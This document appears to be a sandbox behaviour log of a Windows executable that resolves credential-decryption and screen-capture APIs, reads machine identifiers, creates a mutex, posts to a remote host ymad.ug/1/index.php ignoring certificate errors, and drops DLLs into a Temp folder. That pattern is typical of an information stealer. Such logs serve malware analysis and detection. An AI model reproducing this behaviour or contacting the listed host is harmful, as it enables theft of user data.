Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharNextA, address_out = 0x74f57a1b True 1
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74d548ef True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74d54907 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Module Load module_name = oleaut32.dll, base_address = 0x75220000 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysFreeString, address_out = 0x75223e59 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysReAllocStringLen, address_out = 0x75227810 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SysAllocStringLen, address_out = 0x752245d2 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74d54907 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74d5412e True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalLock, address_out = 0x76c4d0a7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x76c349ca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76c31b18 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Module Load module_name = gdi32.dll, base_address = 0x75ad0000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75ae4f70 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75ae5689 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x75ae58b3 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75ae5ea6 True 1
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x74f57446 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74f572c4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleInitialize, address_out = 0x755fefd7 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, base_address = 0x400000 True 1
Keyboard Get Info type = 0, result_out = 4 True 1
System Get Info type = Operating System True 2
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Module Load module_name = crtdll.dll, base_address = 0x6c240000 True 1
Module Get Address module_name = c:\windows\syswow64\crtdll.dll, function = wcscmp, address_out = 0x6c25032a True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdiplusStartup, address_out = 0x73e45600 True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdiplusShutdown, address_out = 0x73e456be True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipCreateBitmapFromHBITMAP, address_out = 0x73e56671 True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipGetImageEncodersSize, address_out = 0x73e62203 True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipGetImageEncoders, address_out = 0x73e6228c True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipDisposeImage, address_out = 0x73e54cc8 True 1
Module Load module_name = Gdiplus.dll, base_address = 0x73e20000 True 1
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, function = GdipSaveImageToStream, address_out = 0x73e54153 True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7560363b True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76c3196e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76c31b18 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x76c3111e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x74d5445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
System Get Computer Name result_out = XDUWTFONO True 1
Mutex Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
System Get Computer Name result_out = XDUWTFONO True 1
Module Get Handle module_name = wininet.dll, base_address = 0x0 False 1
Module Load module_name = wininet.dll, base_address = 0x753d0000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753f49e9 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x754618f8 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = ymad.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request url = ymad.ug/1/index.php True 1
Inet Read Response size = 65636, size_out = 9393 True 1
Inet Read Response size = 65636, size_out = 3464 True 1
Inet Read Response size = 65636, size_out = 908 True 1
Inet Read Response size = 65636, size_out = 65566 True 1
Inet Read Response size = 65636, size_out = 5896 True 1
Inet Read Response size = 65636, size_out = 16044 True 1
Inet Read Response size = 65636, size_out = 5537 True 1
Inet Read Response size = 65636, size_out = 32120 True 1
Inet Read Response size = 65636, size_out = 8760 True 1
Inet Read Response size = 65636, size_out = 3472 True 1
Inet Read Response size = 65636, size_out = 12588 True 1
Inet Read Response size = 65636, size_out = 65636 True 2
Inet Read Response size = 65636, size_out = 36628 True 1
Inet Read Response size = 65636, size_out = 32120 True 1
Inet Read Response size = 65636, size_out = 65636 True 1
Inet Read Response size = 65636, size_out = 65589 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 27900 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65596 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 16300 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65557 True 1
Inet Read Response size = 65636, size_out = 65573 True 1
Inet Read Response size = 65636, size_out = 42484 True 1
Inet Read Response size = 65636, size_out = 14592 True 1
Inet Read Response size = 65636, size_out = 65557 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 64353 True 1
Inet Read Response size = 65636, size_out = 65573 True 1
Inet Read Response size = 65636, size_out = 65565 True 2
Inet Read Response size = 65636, size_out = 57068 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 17561 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 65557 True 1
Inet Read Response size = 65636, size_out = 46801 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 46729 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 17632 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 55488 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 8872 True 1
Inet Read Response size = 65636, size_out = 65565 True 3
Inet Read Response size = 65636, size_out = 61448 True 1
Inet Read Response size = 65636, size_out = 3464 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 65565 True 2
Inet Read Response size = 65636, size_out = 65557 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65558 True 1
Inet Read Response size = 65636, size_out = 65572 True 2
Inet Read Response size = 65636, size_out = 65557 True 1
Inet Read Response size = 65636, size_out = 65573 True 1
Inet Read Response size = 65636, size_out = 39532 True 1
Inet Read Response size = 65636, size_out = 3464 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65573 True 1
Inet Read Response size = 65636, size_out = 65564 True 1
Inet Read Response size = 65636, size_out = 65596 True 1
Inet Read Response size = 65636, size_out = 65604 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 4808 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65572 True 1
Inet Read Response size = 65636, size_out = 65565 True 1
Inet Read Response size = 65636, size_out = 65550 True 1
Inet Read Response size = 65636, size_out = 11020 True 1
Inet Read Response size = 65636, size_out = 65564 True 1
Inet Read Response size = 65636, size_out = 65565 True 2
Inet Read Response size = 65636, size_out = 29851 True 1
Inet Read Response size = 65636, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Inet Close Session - True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
System Get Computer Name result_out = XDUWTFONO True 1
File Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll, size = 18744 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll, size = 17856 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll, size = 18744 True 1
